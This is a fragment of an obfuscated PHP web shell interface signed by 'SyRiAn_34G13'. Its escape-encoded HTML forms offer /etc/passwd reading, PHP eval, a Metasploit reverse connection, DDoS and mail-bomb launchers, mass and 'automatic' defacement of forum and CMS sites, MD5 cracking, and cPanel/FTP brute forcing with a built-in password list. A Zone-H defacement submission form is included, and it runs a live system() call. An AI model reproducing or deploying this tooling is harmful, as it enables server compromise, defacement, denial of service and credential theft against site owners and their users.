<\164\144 \163t\171l\x65='\x62\x61\143\153\147r\x6fu\x6e\144-\x63o\154\x6f\162:#666;\160\141d\x64\151\156\147-l\145\x66t:10\160\x78;'>R\145\141\144\151\156\x67 \106ile\x73 & \104i\162 U\163\151\x6e\x67 \x50\110\x50 \102\165\x67\x73 </\x74\x64></\164\162><\x74r><td \x68e\151\147\150t='45' \143\x6f\154span='2'>
<input type='text' value='/\145\164\143/passwd' name='f\151\x6c\x65' size='33'>
<input \x63l\141ss='\142u\x74\164o\156s' type='submit' name='read' value='\122e\x61\x64 \106\x69\x6c\x65'>
<input \x63\154as\163='bu\x74t\157n\163' type='submit' name='sh\x6f\x77' value='\123h\x6f\167 directory'>
</t\144></\164\162></\164a\x62\154\x65></\x66o\x72\x6d>
<!-- \x45\156\x64 \x4f\146 R\x65\x61\x64\151\156g Fil\145\163 -->
</\x74\144>
<\x74\144>
<!-- \x45val \103\157\144\145 -->
<f\x6f\x72\155 method='\x50\x4fST'><\164\x61bl\145 \x77\151\144\164\150='100%' \x68\145i\147\x68t='72' \x62\157\162\x64\145r='0'  \x69d='\x42\157\x78'><tr>
<\x74\x64 w\151\x64th='4%' h\x65i\x67ht='21' \x73\164\171le='\142\x61\143kg\162\x6fu\x6e\144-\x63\157l\x6f\x72:".$iIi1i11l11OoIlIl."'>&\156b\163\x70;</\x74d>
<\x74\144 \x73\164y\154e='b\141c\x6b\147r\x6f\x75n\x64-\143\157\x6c\x6f\x72:#666;p\x61d\144\x69\x6e\x67-le\x66t:10p\x78;'>\123\143a\156\x6ee\x72\x73 \101\156d S\x74rin\x67s T\157ols </\x74\x64></t\162><t\x72><\164d h\x65\151\x67h\x74='45' c\157\x6c\x73\x70\141\x6e='2'>
<input type='text' id='\160\x68\160_ev\141l' name='\160hp_\145\x76a\154' size='50' value='<?p\150\160 e\143\x68o \"\123\x79\122\x69An_\123\x68\x33l\154 \1265.6\"; ?>' /> 
<\163el\x65\143\164 \151d='\x65\166\x61lO\162\x45\x6e\143' name='ev\141\154\117\x72Enc' o\156\143ha\156\147\145='e\x76\x61\x6c\x4f\162\x45\156\x63\062();'>
<option value='e\x76\141\x6c'>\x45va\x6c \x43o\144\145</option>
<option value='e\x6ec'>\x45\x6e\x63r\x79\160\x74i\157\x6e</option>
<option value='\x61nal\x79\172\145'>A\156\141l\171\172\145</option>
<option value='sc\x61\x6e'>S\x63a\156 Po\x72\x74\x73</option>
<option value='\147\145\x6eSe\162\166'>S\145\x72\166\145\162 \123\x68\x6fr\164c\x75\x74</option>
<option value='\163qlS\x63a\x6e\x6e\x65\x72'>S\121L \x53\x63ann\145\x72</option>
</\x73\x65\154e\x63t>
<input type='submit' name='\x73ub\x6d\x69tEva\154' value='~\x44\157~'></\x74d></tr></\164\x61\142\x6c\x65></\146or\155>
<!-- \105\x6e\144 \117\x66 E\x76\x61l \103o\x64\x65 -->
</\x74\144>
<\164\144>
<!-- \115\145\164a\163\x70\154\x6fi\x74 \x52\x43 -->
<fo\x72m method='\120\117ST'><t\x61\142\x6c\x65 wi\x64\x74\x68='100%' h\x65\x69g\x68\x74='72' \142o\162d\x65\162='0'  \151\x64='\102o\x78'><\x74\162>
<t\x64 \167\x69\144t\x68='4%' \x68\145\151\x67\150\x74='21' s\164\171\x6c\145='b\x61\143\x6b\x67\162ound-\x63o\x6c\x6f\x72:".$iIi1i11l11OoIlIl."'>&n\142s\x70;</\164d>
<\x74\144 \163\x74\171le='\142\141\x63kg\x72\157u\x6ed-co\154\x6f\x72:#666;\x70\141\x64d\151ng-\x6c\x65\x66\x74:10\x70x;'>M\145\164\x61\x73p\x6co\151t \103o\156n\x65\143ti\157\156 </\164\144></t\x72><\164\x72><\164\x64 \x68e\x69g\150\164='45' co\x6csp\x61\x6e='2'>
<input type='text' size='40' name='ip' value='127.0.0.1'>
<input type='text' size='5' name='port' value='443'>
<input type='submit' value='\103\x6f\x6en\x65\143\x74' name='\155\x65\x74\x61\x43\x6fn\156ect'>
</t\x64></\164r></ta\142\x6ce></\x66o\x72\x6d>
<!-- E\x6ed \117f Me\x74\141\163\x70loit \122\103 -->
</\x74\x64>
</t\x72>

<\x74r>
<\x74d>
<!-- D\x44\117\x53 \x41\164t\141\143k\145\162 -->
<\x66\x6frm method='\120\117\x53\x54'><\x74\x61\x62\x6c\x65 \x77\151d\164\150='100%' \x68e\151g\150\164='72' \x62\157rd\x65\x72='0'  i\144='\102\x6f\170'><\164\162>
<\164\144 \167i\144\164\150='4%' \x68\x65\151\147\150\164='21' \163\x74\x79\x6ce='b\141c\153\x67r\x6f\x75\x6e\x64-col\x6fr:".$iIi1i11l11OoIlIl."'>&\156\142s\160;</\x74d>
<\x74d s\164\171l\145='b\x61\x63kg\x72\157\165n\x64-\143o\x6c\x6fr:#666;\x70\x61d\x64\151\156g-l\145\x66\164:10px;'>\104\104O\x53 \101\x74ta\143\x6be\162 </td></t\x72><\164r><\x74\x64 h\x65i\x67\x68\x74='45' co\x6c\x73pa\156='2'>
<input type='text' name='\151\160T\157\101\x74t\141\x63\x6b' size='30' value='\150\164\164\160://google.\x63\x6fm/'>
<\x73el\145ct name='DDO\x53\124\x79p\145'>
<option value='\164\143\x70' >\x54\103\120</option>
<option value='u\x64\x70' >UD\x50</option>
</\163el\145c\164>
<input type='submit' name='S\x74ar\x74A\164\x74\x61\x63k' value='A\164\x74\x61\x63k'>
</\x74\x64></t\x72></t\x61\142\154\145></f\x6f\x72m>
<!-- \x45nd O\146 \x44\104O\123 At\x74ac\153er -->
</\164\x64>
<\164d>
<!-- U\160l\x6f\x61d F\151\154\x65\163 -->
<f\x6fr\x6d \145\156\x63\164\171\x70\145=\"m\x75lt\x69\x70\x61rt/fo\162\x6d-data\" method=\"PO\123\x54\"><\164\141b\x6ce \x77\x69dt\150='100%' he\x69gh\x74='72' \x62\157\162\144\x65\162='0'  id='\x42\x6f\x78'><\x74\162>
<\164\144 wid\x74h='4%' \150ei\147\x68t='21' s\x74y\x6c\145='\142ac\153\x67\162\x6f\165n\144-\x63olo\162:".$iIi1i11l11OoIlIl."'>&\156bsp;</\164\x64>
<\x74\144 \x73t\171\x6c\x65='b\141\x63k\147ro\165\156\144-c\157l\x6f\x72:#666;\x70\x61\x64\144\151\x6e\x67-\154e\146\164:10\160x;'>\125p\154o\141\144 \x46i\154\145\163 <input type='\142\x75\164\x74\157\x6e' value='+' \151\x64='\141ddU\160\154o\141\x64' size='5' \x6f\156c\x6c\x69\x63k='\141\x64\x64U\x70\x6co\141d\111n\160\165\x74();'></t\144></t\162><\x74\x72><\164\144 \x68\x65i\x67\x68t='45' \x63\x6fl\163p\x61\x6e='2'>
<input type='\146\151\154\x65' name='\165\x70\x6c\x6f\x61\x64\146\151\x6c\x65[]'><input type='\x66\x69l\145' name='\165\x70\x6c\x6f\x61\144f\151\154\x65[]'>
<\144i\x76 \x69d='\x75\x70l\x6f\141\144\111\x6ep\x75\x74'></\x64iv>
<input type='h\151d\144e\156' name='uploadingDir' value='".getcwd()."'/>
<input type='submit' value='\x55p\x6c\x6fa\144 File\x73' name='\x55\x70l\x6fad\116\157w'>
</\164d></\x74\x72></\164a\142\x6c\145></\146\x6f\162\x6d>
<!-- \105\156\x64 \117\x66 Up\154o\x61d \106\x69l\x65\163 -->
</\x74d>
<t\144>
<!-- A\103\x50 \106\x69\156de\162 -->
<\146\x6fr\155 method='\120\x4f\x53\x54'><ta\x62\x6c\145 w\x69d\164\150='100%' \150\x65\151\x67\x68\x74='72' \142\157\162\x64\145r='0'  \x69d='\102\157\x78'><\164\x72>
<t\x64 \x77i\x64t\x68='4%' h\145\x69g\150\x74='21' \x73t\171\154e='b\141c\x6b\147\x72\157u\x6e\144-\143\x6f\x6c\157r:".$iIi1i11l11OoIlIl."'>&nbsp;</\164\144>
<t\x64 \163\164\171\154\145='\142\x61ckg\162o\x75n\144-co\x6co\x72:#666;p\141\x64\144\151n\x67-\x6c\145\146t:10\x70\170;'>\101C\x50 \106\x69\156de\162 </t\x64></\x74r><\x74r><\164d h\145i\147\x68\164='45' \x63o\x6c\163pa\156='2'>
<input name='\150\141s\150_\154\x6f\x6c' \x63\x6cas\163='te\x78\x74\142\x6f\170' type='text' size='38' value='\x68t\164\x70://\x77\167\167.\x65x\x61\155\x70\154\145.co\155/'/>
<input type='text' value='.\x70\150p' name='extention' size='5'/>
<input name='\163\165\x62\155\x69\x74_\154o\154' c\x6cas\163='\x74\x65\170t\x62\157x' value='\102\x72\165t\145F\x6fr\x63e \x4eo\x77' type='submit'>
<!-- \105n\144 \117\x66 \x41C\120 F\x69n\x64\145r -->
</\x74\144></t\x72></\x74\x61\142\x6c\145></\146\157\162m>
</\x74\x64>
</t\162>

<\164\x72>
<td v\x61\154\x69g\156='\x74op'>
<!-- \123QL \x52\145ad\145\162 -->
<f\157rm method='\x50OS\124'><\164\x61b\154\x65 \167\x69\144\x74h='100%' hei\147\x68\x74='72' \142\157r\144\145\162='0'  id='B\157\170'><\164r>
<t\x64 \167\151d\x74h='4%' h\145\151\x67\150\164='21' \163\x74\171le='\142\141\x63kg\x72\157\165\x6e\x64-\x63\x6f\154o\162:".$iIi1i11l11OoIlIl."'>&\156\142s\x70;</t\x64>
<\x74d \163ty\154\x65='\142\x61\x63\153\147\x72\x6f\x75\156\x64-\x63o\x6c\x6f\x72:#666;p\141\x64\x64\x69\156\x67-l\x65\146\x74:10p\x78;'>\115\x61\163\163 \x44e\x66\141\143\x65\155\145\156\164</t\x64></\164r><\x74\162><\164\144 \150\145i\x67h\164='45' c\x6f\154\x73\160\141\x6e='2'>
<input type='text' name='m\x61\x73\163\104\x69r' \151\x64='m\x61s\x73D\151r' value='".getcwd()."' size='45' />
<input type='text' name='mas\163F\151leN\141\x6de' \151d='ma\x73\163\106\151l\x65\x4e\x61\x6d\x65' value='index.htm\154' size='15' /><\x62r>
<input type='text' name='\x6d\x61s\163\x49n\144ex' id='\155\141\x73s\104\151r' value='H\x61\143\153ed \102y \x53\171\x52i\101\156_\x33\x34\x47\061\063' size='70' /><\x62r>
<input type='submit' name='\155\141\163\163D\x65f\x61\143\x65\x4eo\x77' value='\x44\x65fa\143e \116ow' />
</\164d></\x74\162></\x74\x61b\x6c\x65></\146\157\x72\x6d>
<!-- \x45nd \x4f\146 \123\x51\x4c Read\x65\162  -->
</\x74\144>
<\164\144 v\141\x6c\151g\156='to\x70'>
<!-- \x4dD\x35 \103\x72\141c\x6b\145r -->
<\x66\157r\x6d method='\120O\123T' name='n\163\164'><\x74\x61\142l\145 w\151\144\x74h='100%' \150\x65\x69\x67\x68\164='72' \x62o\x72\144e\162='0'  i\x64='\x42o\170'><tr>
<\x74\x64 w\151\144th='4%' he\x69g\150\164='21' \163\164\x79le='\142\x61\x63kgr\x6f\x75n\144-col\157\x72:".$iIi1i11l11OoIlIl."'>&n\x62\163\160;</\x74\144>
<\164d \163\164\x79\x6c\x65='bac\153\147\x72\x6f\x75\x6ed-c\157\154\x6f\162:#666;p\x61\x64d\151\x6e\147-\154\145ft:10p\170;'>MD\x35 C\162\x61\143k\x65\x72</\164d></tr><\164\x72><\x74d \x68\145\x69\x67h\x74='45' col\x73\x70\x61\x6e='2'>
<input name='pass' size='80' value='\x6d\1445 \150\x61s\150'><\x62r>
<input type='text' name='chars' value='\103\150\141\x72s' size='80' /><\142\162>
<input type='submit' value='\x43\x72\x61c\x6b' name='\x43r\141\x63k\115\x64\x35'> <fo\x6e\164 \x63\x6f\154\157\162=\147\x72\x61y>\x45\x4e:</\146\157\x6e\x74>
<a h\x72\145f=ja\x76\x61\x73\x63r\x69\160t:ins('a\x62c\x64\x65fgh\151j\153l\155n\x6f\160q\162\x73t\x75\166\167xy\x7a')>a-\172</a>
<a hr\x65\146=\152\141\x76\x61\163c\162i\x70\x74:\151n\163('\101B\x43\104E\x46\107HIJK\x4c\x4d\116O\120\121R\123TUV\127\130\x59Z')>A-\132</a>
<a \150\x72\145f=\152av\x61s\x63\162i\160t:\x69n\x73('0123456789')>0-9</a>
<a \x68\x72\x65\146=j\x61\166\x61\x73c\x72i\x70t:\151\156\x73(\"~`'\!#$%^&*()-_+=|/?&g\x74;<[]{}:&\x6e\142s\160;.,\&\x71u\x6ft;\")>\x53\x79m\142\x6f\x6cs</a>
</\164\144></t\162></\164\141b\x6ce></\x66o\162\x6d>
<!-- \x45\x6e\144 \117\146 MD\x35 Cr\141c\x6b\145\x72 -->
</\164\x64>
<t\x64 va\x6c\151\x67n='\164o\160'>
<!-- F\141\x73\x74 \124\157\157\154\163 -->
<\146o\162\x6d method='P\117\x53\x54'><t\141b\154\x65 w\151\x64\164\x68='100%' h\x65i\x67\x68\164='72' \142\157r\144\x65r='0'  \151\x64='\102ox'><\x74\162>
<\164d \x77\151d\x74h='4%' \150\x65\151\147\x68\164='21' s\x74\x79\x6c\145='b\141\143\x6bg\x72o\x75\156d-\143\157l\157r:".$iIi1i11l11OoIlIl."'>&n\x62\163\160;</t\x64>
<\164\x64 \x73\164\x79\154e='b\141\x63\153\147\162\157\x75\156d-col\x6f\x72:#666;\x70a\x64din\x67-l\x65\x66\164:10\160x;'>\x46\141s\x74 T\157\x6fls </t\144></\x74\162><\164r><td \x68\145i\147h\x74='45' \x63\157\x6c\163\160\141\156='2'>
<\x73el\145\x63\164 name='\x73\x6f\x6de\x41\143t\x69\157n'>
<option value='\x67\x65\x6e\x48tac\x63e\163s'>\x47e\x6e\x65\x72\x61\x74\145 .H\x74a\143\x63es\x73</option>
<option value='\x67e\x6eP\150\x70'>Ge\x6ee\162a\x74\x65 PHP.\111\116\x49</option>
<option value='g\x65n\111\x4eI'>\107\x65n\x65r\141\164e IN\x49.\120\x48\120</option>
<option value='f\151n\144\x43\x6f\156'>Fi\x6ed \101\154\x6c \x43on\x66\151\x67s</option>
<option value='showUsers'>Sho\167 Users</option>
<option value='\x44\117\x53\x53e\x72\x76e\x72\x31'>\x44\x4fS \x53\x65rver 1</option>
<option value='\x44\117\x53\123e\162ver2'>\x44\x4f\x53 S\145\162\166\x65\162 2</option>
</\x73\145l\x65\143t>
<input type='submit' value='\104o \101\x63\x74\x69\x6f\x6e' name='\x64\157\x41ct\x69\157\x6e'>
</t\144></\x74r></\x74\141\x62l\145></\x66\x6f\x72m>
<!-- E\x6e\144 \117\146 F\141\163t \124\157\x6f\x6c\x73 -->
</\164d>
</\164r>
<\x74\x72>
<\164\x64 v\x61\154i\147\156='\164\157\x70'>
<!-- \x53\121L \x4da\147\x69c -->
<f\157\x72m method='\x50OS\124'><\x74\141b\154\x65 \167i\x64th='100%' \150\145\x69\x67\x68\164='72' b\x6f\x72\144er='0'  i\144='B\x6f\170'><\164r>
<\164\x64 \x77i\x64\164\150='4%' \150\145\x69\147\150\164='21' s\x74\171\x6c\x65='\x62a\x63\x6bgrou\x6ed-\x63\157\154\x6f\x72:".$iIi1i11l11OoIlIl."'>&nb\163\x70;</td>
<td \x73\x74\x79l\x65='\x62ac\153\147\162\x6f\x75\x6e\x64-\x63\157l\x6f\162:#666;pa\x64d\x69n\x67-\x6c\145\x66\164:10\x70\x78;'>\x53\121\x4c</td></\164\162><\x74\x72><\x74\144 \150\145i\x67ht='45' \143o\154s\x70\x61\x6e='2'>
<input type = 'text' name='QU_\110O\x53T' value='127.0.0.1'>
<input type = 'text' name='\x51\x55_U\x53\x45\x52' value='DB \x55\163\145r'><br/>
<input type = 'text' name='\x51\125_\x50\101S\x53' value='\104\x42 \x50\x61\x73\163'>
<input type='text' name='QU_\x44\x42' value='\x44\x42 \x4e\x61m\145' >
<\163\x65\154\145\x63\164 \x69d='\123Q\x4c\124\x79\x70\145' name='\x53Q\x4cT\x79p\145' o\x6ec\150\141n\147\145='C\x68\141\x6e\147eS\x51\114Ty\160\145();'>
<option value='\123\121\114\x51u\x65\x72y'>\x53\x51\x4c Q\x75\x65\x72y</option>
<option value='\123Q\x4cR\x65ad\145\162'>\x53QL \x52\x65\x61\144\145\162</option>
<option value='\x45m\141\151l\x45\170\x74\162a\143t\x6f\162'>E\155ail \105xtr\x61\143\x74\x6f\x72</option>
</\163\145\x6c\145\143t>
<\x64\x69\x76 \x69\144='\151\156put\x54yp\145' >&\156\142s\x70;</\x64\x69\166>
<input name='MySQLQuery' type='submit'>
</td></tr></\164\141\x62\x6ce></\x66\157\162m>
<!-- \x53Q\x4c Q\165e\x72\x79  -->
</\x74\144>
<td \166\x61\x6c\x69\147n='t\x6f\x70'>
<!-- \x41u\164\157M\x61\164i\x63 \x48\x61\x63\x6b\x69\156\x67 -->
<\146\x6fr\155 method='POS\124'><\164\141bl\145 w\x69d\x74\x68='100%' \150\x65\x69ght='72' bor\144\x65r='0'  \151\144='B\157\x78'><\x74\x72>
<t\x64 \x77\151dt\150='4%' \150\145\x69\x67\150\164='21' s\x74y\154\x65='b\141\143k\x67\x72\157\165\156\x64-\x63\x6f\x6c\157\x72:".$iIi1i11l11OoIlIl."'>&n\142sp;</\x74d>
<\x74\144 \x73ty\154\x65='\142a\x63\x6b\x67r\157u\156\144-\143\157\x6c\157\162:#666;\160\141\x64\144in\x67-\154\145\146\164:10\160\170;'>\101u\164\x6f\x6da\164i\x63 \x48a\x63\153i\x6e\x67</td></t\x72><tr><\164\144 he\151\x67ht='45' \143\157\x6c\163pa\156='2'>
<input type='text' value='dom\x61\x69\156.c\157\155' i\x64='d\x6f\155a\x69\156' name='domainToHack' size='45'  o\x6e\142\154u\162='Bl\x75\162(\"d\157\x6da\151\x6e\",\"\x64\157\155\x61in.\143o\155\");' onc\x6c\151\x63k='\x43\154\x65ar(\"d\x6f\x6d\141\151n\",\"\144\x6fm\141in.\143\x6fm\");'  >
<input type='text' value='/v\x62' name='scriptPath' size='10'>
<s\x65\154\145\143\x74 name='ScriptType' >
<option value='v\142'>\126\x42ull\x65\164\x69\156</option>
<option value='\x77\x70'>W\x6f\x72d\120r\x65\163\163</option>
<option value='\152\157s'>J\157oml\141</option>
<option value='\x69pb'>\x49P.\102o\141\x72d</option>
<option value='\x70\150p\142b'>\120HP\102\102</option>
<option value='\x6d\171\x62\x62'>M\x79\x42B</option>
<option value='\163m\x66'>\x53\115\x46</option>
</sel\145\x63\x74><\142r />
<input type='\x68i\x64\x64\145\x6e' name='a\x75\x74\x6f\110a\143kDi\162' />
<\164ex\164a\162\145\141 name='index' \143\157\x6c\163='50' rows='5' \x69\x64='\x49\156d\x65\x78'  on\142\154\x75\162='\x42l\165r(\"In\144e\170\",\"\110a\x63\x6b\x65\144 \x42\x79 \123\x79\x52\151\101\156_3\064\1071\063\");' \x6f\x6e\x63\x6cic\x6b='C\154\x65\141\x72(\"\x49\156\144\145\x78\",\"Hac\153\145\x64 \102\x79 \x53\171\x52\151\x41\156_\x334\x47\061\063\");' >\x48\x61\x63\153\145\144 \102\x79 \123\171\x52\x69A\156_3\x34G13</\164\145\x78\x74a\x72e\141>
<input type='submit' name='\101\x75t\157\x48a\143k\116ow' value='\x48a\143k \116o\167' />
</\x74\x64></\164r></\x74\141\142l\x65></\146\x6f\162\155>
<!-- \105n\144 \117\x66 \105m\141\151\x6c \105\x78\164\162a\143\x74or -->
</\x74\144>
<\x74\x64 \166\x61\154i\147\x6e='\x74\157\160'>
<!-- \x4d\141il Stor\x6d -->
<\x66\x6f\162\x6d method='\x50\x4f\x53\124'><ta\x62le wi\144\x74h='100%' \x68ei\x67\150t='72' \x62\x6f\162\144e\x72='0'  id='\102ox'><t\162>
<\164d \x77i\144\x74\x68='4%' he\151\147h\x74='21' sty\x6c\x65='\142ac\153\147\162\x6f\165\x6e\144-\143olor:".$iIi1i11l11OoIlIl."'>&nb\163\160;</\x74d>
<\164\144 \x73\164\x79\154\x65='\142\x61\x63kgr\157\165nd-\x63o\154o\x72:#666;\160\141d\144\151\156\147-l\145\146\164:10\x70x;'>\115\x61\x69\x6c \x53\164or\x6d </\x74\144></\x74r><\x74\162><\x74\x64 he\151g\150t='45' \143\x6fl\163\x70\141\156='2'>
<\164\145\x78\164\x61re\141 rows='6' c\x6f\x6cs='45' name='Comments' i\x64='Comments' o\x6e\x62\x6c\165\x72='\x42\x6c\165\162(\"Comments\",\"\101\164\164\141\x63\x6b\x65\162 Message\");' o\156\143\154i\x63\x6b='\103\x6c\145\x61\162(\"Comments\",\"\x41t\164\141\x63k\145\x72 Message\");' >\101\164\164\141\143\x6be\162 Message</\164\145\170\164\x61\162\145\141>
<input type='text' name='to' value='\124\141\162\x67\x65t E\x6d\x61il' \151d='to' size='35'  \157n\x62\154ur='B\x6cu\162(\"to\",\"\x54a\x72g\145t \x45m\x61il\");' o\156cl\151\143\x6b='Clear(\"to\",\"T\141r\147et \x45\155\141\x69\x6c\");' >
<input type='text' size='5' name='nom' value='100'>
<input name='\163\145n\144M\141ilSt\157r\155' type='submit' value='S\145\156d Ma\x69l \123\164\x6f\162\x6d ' >
</\x74d></\164r></t\141\142\154\145></f\157\162\155>
<!-- E\156\144 Of \115ai\154 \123t\157\x72\155 -->
</\164d>
</\x74r>
<\164r>
<\x74\x64 \166\x61\154ig\x6e='\x74o\160'>
<!-- \x5a\157n\145-\x48 -->
<fo\162m method='\x50\x4fS\124'><t\141\x62l\x65 \167\x69\x64t\150='100%' \150\145\151\147ht='72' \x62o\x72d\145r='0'  id='\x42ox'><tr>
<\x74d w\151d\164\150='4%' h\x65i\147h\164='21' \x73\164\x79l\145='b\141\x63\153\147\x72o\x75\156d-\x63\157\x6c\x6fr:".$iIi1i11l11OoIlIl."'>&\x6eb\x73p;</\x74\x64>
<\x74\x64 \x73\164\171\x6c\145='b\x61\x63\x6bg\162\x6f\165\156\x64-\143\157\154\x6fr:#666;\x70a\144\x64i\156g-l\145\x66\x74:10\x70x;'>\x5ao\x6e\x65-\x48 \x44\145\146\141\x63er</t\x64></\x74\x72><\x74\162><\x74\x64 hei\147ht='45' \143\x6f\154\163\x70\x61\156='2'>"; echo '<form method="post">
<input type="text" name="defacer" size="70" value="SyRiAn_34G13" />
<select name="hackmode">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option>
<option value="21" >Remote administrative panel access social engineering</option>
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>

<select name="reason">
<option >--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<textarea name="domain" cols="44" rows="9" id="domains" onblur="Blur(\'domains\',\'List Of Domains\');" onclick="Clear(\'domains\',\'List Of Domains\');" >List Of Domains</textarea>
<input type="submit" value="Send Now !" name="SendNowToZoneH" />
</form>'; echo "</\164d></\164r></\164\x61\x62\x6ce></form>
<!-- E\x6e\144 \x4f\x66 \132\x6f\156e-\110 -->
</\x74\x64>
<\x74d \166a\154\x69\x67n='\164\157\160'>
<!-- C\160\x61\x6ee\154 \x41n\144 \106T\x50 \x42\x72\165teFo\x72ce \101\x74t\x61\143\x6ber -->
<\x66\x6frm method='\120\x4f\x53T'><\x74\141\142\154e w\151\144t\150='100%' \150\145\151\147h\164='72' \142\x6f\x72\x64\145\162='0'  \151d='B\157x'><\164r>
<\164d \167\x69\144th='4%' \x68\145i\x67\x68\164='21' \163\164y\x6ce='b\x61c\153g\x72\x6fu\x6e\x64-\143\157lo\162:".$iIi1i11l11OoIlIl."'>&\x6eb\163\160;</\x74\144>
<t\144 \163\x74\171\x6c\x65='\142\x61ckgr\157\x75\x6ed-c\157lo\162:#666;\x70ad\144i\156\147-\154\145\x66\x74:10\160x;'>C\160a\156el \x41\156\144 \x46\124\120 B\x72\165\x74\x65\106\157\162\143\145 </\x74\144></tr><\x74\x72><\x74\144 \x68\145\151g\x68\x74='45' \143\157l\x73\160\x61n='2'>
<\164\145\x78\164a\162e\x61 rows='12' name='\165s\x65\x72s' c\157\x6c\x73='23' >"; system('ls /var/mail'); echo "</t\145\170\164a\162\145a>
<t\x65x\x74\x61\162\145\141 rows='12' name='pas\x73w\x6f\162\144\163' \x63\157\154\163='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$%^&*(\npassword\npasswd\n\160\141\163\163\167or\144s\npass\n\160@\141ss\1670r\x64\npass@\167\x6fr\x641
</t\x65\x78t\141r\x65a>
<input type='text' name='target' size='16' value='127.0.0.1' >
<input name='cracktype' value='\143\x70\x61\x6e\145\154' \143h\x65\x63k\145\144 type='\162\x61\144\x69o'><\163y>\x43\x70\141n\x65\154 (2082)</\163y>
<input name='cracktype' value='ftp' type='r\141\144\151\x6f'><\163\x79>\106\164p (21)</\163\171>
<input type='submit' value='   C\x72\141\x63\153 it !   ' name='B\162\x75\x74\x65F\x6fr\x63\x65Cp\x61\x6ee\154A\156\144F\124\x50' >
</\x74\144></\x74\162></\x74a\142l\x65></fo\x72m>
<!-- \x45\156\144 O\146 Cp\141n\145\154 \x41\156d \x46\x54\120 \102\x72\165\x74eF\157\162c\x65 \x41t\x74\141\143\153\x65\162 -->
</\164\x64>
<\x74d \x76\x61\x6c\x69g\156='\x74op'>
<!-- S\x63r\151\x70t\x73 \x48\141\143\153i\x6e\147 -->
<\146\x6f\162\155 method='\120\x4f\123\124'><\164a\x62\x6ce \167i\x64t\x68='100%' \x68\x65ig\x68\x74='72' b\157\162\x64er='0'  \x69\144='\102\x6f\x78'><t\162>
<td width='4%' h\x65\x69\x67\150\164='21' st\171\154e='b\141c\153\x67\162\x6fu\156d-\x63\x6fl\157r:".$iIi1i11l11OoIlIl."'>&\x6e\142sp;</\x74d>
<\x74d \x73\x74\171le='\142a\143\x6b\147\162ou\156\x64-c\157\x6c\x6f\x72:#666;p\x61\x64\144\151n\147-\154\145\146\x74:10\160\170;'>\123\143\162\x69\160\164s Ha\x63\x6bi\156\x67</\164\144></tr><\164r><td h\145\151\x67\x68t='45' \x63\x6f\154\163pan='2'>
<input type='text' name='H\x4f\123T' \151\144='\110OS\x54' value='127.0.0.1' \x6f\x6e\142\x6c\x75\162='B\x6cu\x72(\"\110OS\x54\",\"127.0.0.1\");' \157\x6e\x63\x6c\x69\x63k='C\x6c\x65\141\x72(\"\110\x4f\123\124\",\"127.0.0.1\");'>
                        <input type = 'text' name='U\x53\105\122' \151\x64='\125\x53E\x52' value='D\102 Username' o\x6eb\x6c\x75\x72='\x42lu\x72(\"\125\x53\x45R\",\"\x44B Username\");' \157\156c\154i\143\153='\103\154e\x61r(\"US\x45\x52\",\"\x44\102 Username\");'>
                        <input type = 'text' name='\x50\x41\123S' id='\x50\x41\x53\x53' value='\104B \x50\141\163\x73\x77\x6frd' \157\x6e\142\x6cur='\x42\x6cu\162(\"\120AS\123\",\"\x44\x42 \x50a\x73\x73\x77or\144\");' on\x63l\x69\x63\153='C\154ea\162(\"PASS\",\"\x44\x42 P\141\163swor\x64\");'>
                        <input type ='text' name='D\x42' \x69d='D\x42' value='\x44\x42 \116\141\155\x65' o\x6e\142\154\x75r='Blur(\"\104B\",\"\x44\102 \116\141\155\x65\");' \x6f\156\x63lic\x6b='\x43\x6c\145\141r(\"D\102\",\"\x44\102 N\141\x6de\");'>
                        <input type ='text' name='\x50\x52\105F\x49X' \x69\144='\120\162efix' value='\x50r\145f\x69\x78' o\x6eb\154\165\x72='B\154\165\x72(\"\120\x72\145f\151x\",\"P\162\145\146\x69\x78\");' \157n\x63l\151ck='\x43l\145\x61\162(\"\120\162\x65fix\",\"\120\162\145\146i\170\");'>
                        <\163\x65le\x63\x74 name ='ScriptType' \x69\144='ScriptType' o\156\143\x68\141\156\147\x65='S\x63\x72\x69p\x74s\x54\171\x70\x65();' >
                        <option value ='\x76b'>\x56\x42\165\154l\145t\x69n</option>
                        <option value ='w\160'>W\157rdPr\x65s\163</option>
                        <option value ='\152\157s'>\x4aoo\155\154a</option>
                        <option value ='i\160\142'>\x49P.\x42oa\x72\x64</option>
                        <option value ='p\150\x70\x62b'>P\x48\120\x42\102</option>
                        <option value ='\155\x79b\x62'>MyB\x42</option>
                        <option value ='\163\x6df'>\x53M\x46</option>
                        </\163e\x6c\x65\x63\164>
                        <s\145l\x65\x63t name='hackingType' id='hackingType' \x6f\156\143\x68\x61\x6e\x67e='hack\x69\x6egT\171\160\x65\x73();'>
                        <option value='i\x6e\144e\x78\x43\x68a\x6e\147\x65r'>\111n\144e\170 \x43\x68\141\156\147\x65\x72</option>
                        <option value='\x64ecr\171\x70t'>D\x65\x63\x72y\x70t C\157\x6efi\x67</option>
                        <option value='changeInfo'>\111\x6e\146\157 C\150\x61\156ge\162</option>
